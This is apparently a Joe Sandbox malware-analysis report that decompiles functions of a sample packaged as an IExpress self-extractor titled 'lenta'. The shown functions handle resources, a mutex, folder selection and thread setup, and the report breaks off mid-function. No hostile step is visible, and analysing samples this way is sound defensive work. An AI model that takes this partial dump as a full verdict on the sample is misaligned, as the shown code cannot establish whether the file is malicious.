Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID: &n
API String ID: 3231755760-661210962
Opcode ID: fb9c1ad42f0b6d20b370099aee61d86f5450dc33b5f4a98276a26cd92fcad884
Instruction ID: f1a48d65745b3f932cfd67069c1af06cd711090cfe726fbd61e777a7459fca42
Opcode Fuzzy Hash: fb9c1ad42f0b6d20b370099aee61d86f5450dc33b5f4a98276a26cd92fcad884
Instruction Fuzzy Hash: A3D0C9F2001108BFDF812BEAEC0CA6A3F2CEB48212F4C4120F319A2020CA3244558B52

Uniqueness

Uniqueness Score: -1.00%

Function 00EB7176 Relevance: 7.5, APIs: 5, Instructions: 40
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00EB7176(signed int __eax, void* __edi, signed int __esi) {
				signed int _t32;
				signed int _t33;
				signed int _t35;
				void* _t36;
				signed int _t38;
				void* _t40;

				_t38 = __esi;
				_t36 = __edi;
				if(__eax == __edi || (__esi & __eax) == 0) {
					GetSystemTimeAsFileTime(_t40 - 0xc);
					 *(_t40 - 4) =  *(_t40 - 8) ^  *(_t40 - 0xc);
					 *(_t40 - 4) =  *(_t40 - 4) ^ GetCurrentProcessId();
					 *(_t40 - 4) =  *(_t40 - 4) ^ GetCurrentThreadId();
					 *(_t40 - 4) = GetTickCount() ^  *(_t40 - 4) ^ _t40 - 0x00000004;
					QueryPerformanceCounter(_t40 - 0x14);
					_t32 =  *(_t40 - 0x10) ^  *(_t40 - 0x14) ^  *(_t40 - 4);
					_t35 = _t32;
					if(_t32 == _t36 || ( *0xeb8004 & _t38) == 0) {
						_t32 = 0xbb40e64f;
						_t35 = 0xbb40e64f;
					}
					 *0xeb8004 = _t35;
				}
				_t33 =  !_t32;
				 *0xeb8008 = _t33;
				return _t33;
			}

0x00eb7176
0x00eb7176
0x00eb7178
0x00eb7182
0x00eb718e
0x00eb7197
0x00eb71a0
0x00eb71b1
0x00eb71b8
0x00eb71c4
0x00eb71c7
0x00eb71cb
0x00eb71d5
0x00eb71da
0x00eb71da
0x00eb71dc
0x00eb71dc
0x00eb71e2
0x00eb71e5
0x00eb71ee

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00EB7182
GetCurrentProcessId.KERNEL32 ref: 00EB7191
GetCurrentThreadId.KERNEL32 ref: 00EB719A
GetTickCount.KERNEL32 ref: 00EB71A3
QueryPerformanceCounter.KERNEL32(?), ref: 00EB71B8

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 8646df125b20164b652ad45c578a9f9cb92ca55029cfac35446c8cb8a055a6a5
Instruction ID: 4cb7109ec732299dbd359c0240bf948cf96a849a1569fa5efce486c27a7addcf
Opcode Fuzzy Hash: 8646df125b20164b652ad45c578a9f9cb92ca55029cfac35446c8cb8a055a6a5
Instruction Fuzzy Hash: 9301C2B0D06209DF8F00DFB9EA485AFB7F5AB48304F645A66D801F7210EA309A088A01

Uniqueness

Uniqueness Score: -1.00%

Function 00EB3210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00EB3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E00EB43D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "lenta");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0xeb9a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0xeb91e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E00EB44B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0xeb91e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0xeb91e5 - 3;
						if(_t49 - 0xeb91e5 < 3) {
							goto L32;
						}
						_t24 =  *0xeb91e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0xeb91e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E00EB658A(0xeb91e4, 0x104, 0xeb1140);
								_t27 = E00EB58C8(0xeb91e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0xeb91e4 - 0x5c;
									if( *0xeb91e4 != 0x5c) {
										L30:
										_t30 = E00EB597D(0xeb91e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0xeb91e5 - 0x5c;
									if( *0xeb91e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E00EB44B9(_t64, 0x54a, 0xeb91e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0xeb91e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0xeb91e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0xeb91e4 - 0x5c;
						if( *0xeb91e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0xeb9124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0xeb9a3c, 0x3e8, 0xeb8598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00EB4224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0xeb87a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E00EB44B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x00eb321b
0x00eb321e
0x00eb3221
0x00eb343c
0x00eb343e
0x00eb343f
0x00eb3445
0x00eb3447
0x00000000
0x00eb3447
0x00eb3229
0x00eb322a
0x00eb322f
0x00eb33ec
0x00eb33f7
0x00eb3410
0x00eb3416
0x00eb341d
0x00eb342d
0x00eb342d
0x00eb3438
0x00000000
0x00eb3438
0x00eb3237
0x00eb3243
0x00eb3243
0x00eb3246
0x00eb32ee
0x00eb32f4
0x00eb32f6
0x00eb33d4
0x00eb33d6
0x00eb33db
0x00eb33dc
0x00eb33de
0x00eb33df
0x00eb3370
0x00eb3372
0x00000000
0x00eb3372
0x00eb32fc
0x00eb3301
0x00eb3301
0x00eb3303
0x00eb3304
0x00eb3304
0x00eb330a
0x00eb330d
0x00000000
0x00000000
0x00eb3313
0x00eb3318
0x00eb331a
0x00eb3331
0x00eb3332
0x00eb333a
0x00eb333d
0x00eb337c
0x00eb3388
0x00eb338f
0x00eb3394
0x00eb3396
0x00eb33a4
0x00eb33ab
0x00eb33b6
0x00eb33be
0x00eb33c3
0x00eb33c5
0x00eb3435
0x00eb3437
0x00eb3437
0x00000000
0x00eb3437
0x00eb33c7
0x00eb33c9
0x00eb33cc
0x00000000
0x00eb33cc
0x00eb33ad
0x00eb33b4
0x00000000
0x00000000
0x00000000
0x00eb33b4
0x00eb3398
0x00eb3399
0x00eb339b
0x00eb339c
0x00eb339d
0x00000000
0x00eb339d
0x00eb334c
0x00eb3351
0x00eb3354
0x00000000
0x00000000
0x00eb335c
0x00eb3362
0x00eb3364
0x00000000
0x00000000
0x00eb3366
0x00eb3367
0x00eb3369
0x00eb336a
0x00eb336b
0x00000000
0x00eb336b
0x00eb331c
0x00eb3323
0x00000000
0x00000000
0x00eb3329
0x00eb332b
0x00000000
0x00000000
0x00000000
0x00eb332b
0x00eb324c
0x00eb324c
0x00eb324f
0x00eb32c8
0x00eb32ce
0x00000000
0x00eb32ce
0x00eb3251
0x00eb3256
0x00000000
0x00000000
0x00eb3271
0x00eb3277
0x00eb3279
0x00eb3298
0x00eb329d
0x00eb329f
0x00000000
0x00000000
0x00eb32b0
0x00eb32b6
0x00eb32b8
0x00000000
0x00000000
0x00eb32be
0x00eb3280
0x00eb3289
0x00eb328e
0x00000000
0x00eb328e
0x00eb327b
0x00000000
0x00eb327b
0x00000000

APIs

LoadStringA.USER32(000003E8,00EB8598,00000200), ref: 00EB3271
GetDesktopWindow.USER32 ref: 00EB33E2
SetWindowTextA.USER32(?,lenta), ref: 00EB33F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00EB3410
GetDlgItem.USER32(?,00000836), ref: 00EB3426
EnableWindow.USER32(00000000), ref: 00EB342D
EndDialog.USER32(?,00000000), ref: 00EB343F

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00EB32E2, 00EB32E7, 00EB3331, 00EB3344, 00EB335B, 00EB336A
lenta, xrefs: 00EB33F1

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$lenta
API String ID: 2418873061-4030079312
Opcode ID: 17eeb5d4fb62b33e62bd9262784ffadc03e1b8bae94f47697dec276f5ff1df40
Instruction ID: eefbb37ae53683378c140bc7f31e6b82c6f14a3058253179a8e49fe9bdc9ef37
Opcode Fuzzy Hash: 17eeb5d4fb62b33e62bd9262784ffadc03e1b8bae94f47697dec276f5ff1df40
Instruction Fuzzy Hash: B9516B70382240BFEB211B3A5C4FFFB699DDB46B58F146238F251F61D1CEA48A05D261

Uniqueness

Uniqueness Score: -1.00%

Function 00EB2CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00EB2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0xeb8004; // 0x92ae1240
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0xeb9a3c = __ecx;
				memset(0xeb9140, 0, 0x8fc);
				memset(0xeb8a20, 0, 0x32c);
				memset(0xeb88c0, 0, 0x104);
				 *0xeb93ec = 1;
				_t20 = E00EB468F("TITLE", 0xeb9154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0xeb858c = _t27;
					SetEvent(_t27);
					_t64 = 0xeb9a34;
					if(E00EB468F("EXTRACTOPT", 0xeb9a34, 4) != 0) {
						if(( *0xeb9a34 & 0x000000c0) == 0) {
							L12:
							 *0xeb9120 =  *0xeb9120 & _t65;
							if(E00EB5C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0xeb8a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0xeb8184 != 0) {
										__imp__#17();
									}
									if( *0xeb8a24 == 0) {
										_t57 = _t65;
										if(E00EB36EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0xeb9a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0xeb9a34 & 0x00000100) == 0 || ( *0xeb8a38 & 0x00000001) != 0 || E00EB18A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00EB6517(_t57, 0x7d6, _t34, E00EB19E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00EB2390(0xeb8a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E00EB44B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E00EB468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0xeb8588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0xeb9a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E00EB44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E00EB44B9(0, 0x54b, "lenta", 0, 0x10, 0);
										L11:
										CloseHandle( *0xeb8588);
										 *0xeb9124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E00EB44B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0xeb9124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00EB6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x00eb2cb5
0x00eb2cbc
0x00eb2cc7
0x00eb2cc9
0x00eb2cd1
0x00eb2cd3
0x00eb2cd9
0x00eb2ce9
0x00eb2cf9
0x00eb2d0e
0x00eb2d15
0x00eb2d1c
0x00eb2ef3
0x00000000
0x00eb2d2d
0x00eb2d34
0x00eb2d3b
0x00eb2d40
0x00eb2d48
0x00eb2d59
0x00eb2d84
0x00eb2e1f
0x00eb2e1f
0x00eb2e2e
0x00eb2e41
0x00eb2e5a
0x00eb2e62
0x00eb2e6c
0x00eb2e6c
0x00eb2e75
0x00eb2e77
0x00eb2e77
0x00eb2e84
0x00eb2e8b
0x00eb2e94
0x00000000
0x00eb2e96
0x00eb2e96
0x00eb2e9e
0x00eb2ea2
0x00eb2eba
0x00000000
0x00eb2ece
0x00eb2ede
0x00eb2eed
0x00000000
0x00000000
0x00000000
0x00000000
0x00eb2eed
0x00eb2eef
0x00eb2eef
0x00eb2eef
0x00eb2eef
0x00eb2ea2
0x00eb2e86
0x00eb2e88
0x00eb2e88
0x00eb2e43
0x00eb2e48
0x00000000
0x00eb2e48
0x00eb2e30
0x00eb2e30
0x00eb2ef8
0x00eb2f01
0x00000000
0x00eb2f01
0x00eb2d8a
0x00eb2d8f
0x00eb2da1
0x00000000
0x00eb2da3
0x00eb2dae
0x00eb2db4
0x00eb2dbb
0x00000000
0x00eb2dca
0x00eb2dd3
0x00eb2df5
0x00eb2e02
0x00000000
0x00000000
0x00000000
0x00000000
0x00eb2dd5
0x00eb2dde
0x00eb2de3
0x00eb2e04
0x00eb2e0a
0x00eb2e10
0x00000000
0x00eb2e10
0x00eb2dd3
0x00eb2dbb
0x00eb2da1
0x00eb2d5b
0x00eb2d5b
0x00eb2d5d
0x00eb2d69
0x00eb2d6e
0x00eb2f06
0x00eb2f06
0x00eb2f06
0x00eb2d59
0x00eb2f18

APIs

memset.MSVCRT ref: 00EB2CD9
memset.MSVCRT ref: 00EB2CE9
memset.MSVCRT ref: 00EB2CF9

Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46A0
Part of subcall function 00EB468F: SizeofResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46A9
Part of subcall function 00EB468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00EB46C3
Part of subcall function 00EB468F: LoadResource.KERNEL32(00000000,00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46CC
Part of subcall function 00EB468F: LockResource.KERNEL32(00000000,?,00EB2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46D3
Part of subcall function 00EB468F: memcpy_s.MSVCRT ref: 00EB46E5
Part of subcall function 00EB468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB46EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB2D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB2D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB2DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00EB2DBD
CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00EB2E0A

Part of subcall function 00EB44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00EB4518
Part of subcall function 00EB44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00EB4554

Strings

INSTANCECHECK, xrefs: 00EB2D95
EXTRACTOPT, xrefs: 00EB2D4D
lenta, xrefs: 00EB2D04, 00EB2DD9, 00EB2DF0
TITLE, xrefs: 00EB2D09
VERCHECK, xrefs: 00EB2E54

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
API String ID: 1002816675-2993962200
Opcode ID: 469b8ec4ade6959c19e9679650f1e9c07f37329b1af091d7c62b8c0f56cbd5ca
Instruction ID: ec5ff9c6744d4a3e9ecb23ccec68795f8336d4cbdb28154f47b3ccf5367447a6
Opcode Fuzzy Hash: 469b8ec4ade6959c19e9679650f1e9c07f37329b1af091d7c62b8c0f56cbd5ca
Instruction Fuzzy Hash: 4C51F3703003016EEB62AB669D4ABFB369CDF85704F04613DFB81F92E2DAB4C845D621

Uniqueness

Uniqueness Score: -1.00%

Function 00EB34F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00EB34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0xeb91d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0xeb8584 = _t35;
					E00EB43D0(_t35, GetDesktopWindow());
					__eflags =  *0xeb8184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "lenta");
					_t17 = CreateThread(0, 0, E00EB4FE0, 0, 0, 0xeb8798);
					 *0xeb879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E00EB44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0xeb858c);
					_t38 =  *0xeb8584; // 0x0
					_t25 = E00EB44B9(_t38, 0x4b2, 0xeb1140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0xeb91d8 = 1;
						SetEvent( *0xeb858c);
						_t39 =  *0xeb879c; // 0x0
						E00EB3680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0xeb858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0xeb879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x00eb34fb
0x00eb34fe
0x00eb3665
0x00eb3666
0x00eb3666
0x00eb3668
0x00eb366e
0x00eb366e
0x00eb3671
0x00eb3671
0x00eb3677
0x00000000
0x00eb3677
0x00eb3504
0x00eb3506
0x00eb3507
0x00eb350c
0x00eb365b
0x00eb365f
0x00000000
0x00000000
0x00000000
0x00eb3661
0x00eb3512
0x00eb3515
0x00eb35be
0x00eb35c1
0x00eb35d1
0x00eb35d8
0x00eb35de
0x00eb35f8
0x00eb3617
0x00eb3617
0x00eb3623
0x00eb3637
0x00eb363d
0x00eb3642
0x00eb3644
0x00000000
0x00eb3646
0x00eb3652
0x00eb3657
0x00eb3658
0x00000000
0x00eb3658
0x00eb3644
0x00eb351b
0x00eb351d
0x00eb354f
0x00eb3553
0x00000000
0x00000000
0x00eb355f
0x00eb3565
0x00eb357c
0x00eb3581
0x00eb3584
0x00eb359b
0x00eb35a1
0x00eb35a7
0x00eb35ad
0x00eb35b3
0x00eb35b8
0x00000000
0x00eb35b8
0x00eb3586
0x00eb3588
0x00000000
0x00000000
0x00eb3590
0x00000000
0x00eb3590
0x00eb3524
0x00eb3535
0x00eb3541
0x00000000
0x00eb3549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 00EB3535
EndDialog.USER32(?,?), ref: 00EB3541
ResetEvent.KERNEL32 ref: 00EB355F
SetEvent.KERNEL32(00EB1140,00000000,00000020,00000004), ref: 00EB3590
GetDesktopWindow.USER32 ref: 00EB35C7
GetDlgItem.USER32(?,0000083B), ref: 00EB35F1
SendMessageA.USER32(00000000), ref: 00EB35F8
GetDlgItem.USER32(?,0000083B), ref: 00EB3610
SendMessageA.USER32(00000000), ref: 00EB3617
SetWindowTextA.USER32(?,lenta), ref: 00EB3623
CreateThread.KERNEL32 ref: 00EB3637
EndDialog.USER32(?,00000000), ref: 00EB3671

Strings

lenta, xrefs: 00EB361D

Memory Dump Source

Source File: 00000000.00000002.320002965.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000000.00000002.319923981.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320287724.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.320579701.0000000000EBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_file.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: lenta
API String ID: 2406144884-2780258678
Opcode ID: 127aa7d57fe6662ac893a7642a9dd90ca28210a4d5d78b0916b80fcb5d1fa050
Instruction ID: 67c5c65905e97a87c563c56bdf6c20f933d25a60b49139c622d16130acc99beb
Opcode Fuzzy Hash: 127aa7d57fe6662ac893a7642a9dd90ca28210a4d5d78b0916b80fcb5d1fa050
Instruction Fuzzy Hash: 5431A0B0241301BFDB205F3AAD0EEAB3B69E785B04F146629F602B52B5CE718904CA51

Uniqueness

Uniqueness Score: -1.00%

Function 00EB4224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00EB4224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E00EB44B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0xeb88c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0xeb87a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0xeb8598;
					_v36 = 1;
					_v32 = E00EB4200;
					_v28 = 0xeb88c0;
					 *0xeba288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0xeba288(_t32, 0xeb88c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0xeb88c0 != 0) {
							E00EB1680(0xeb87a0, 0x104, 0xeb88c0);
						}
						 *0xeba288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0xeb87a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0xeb88c0);
					_t61 = 0xeb88c0;
					_t4 =  &(_t61[1]); // 0xeb88c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
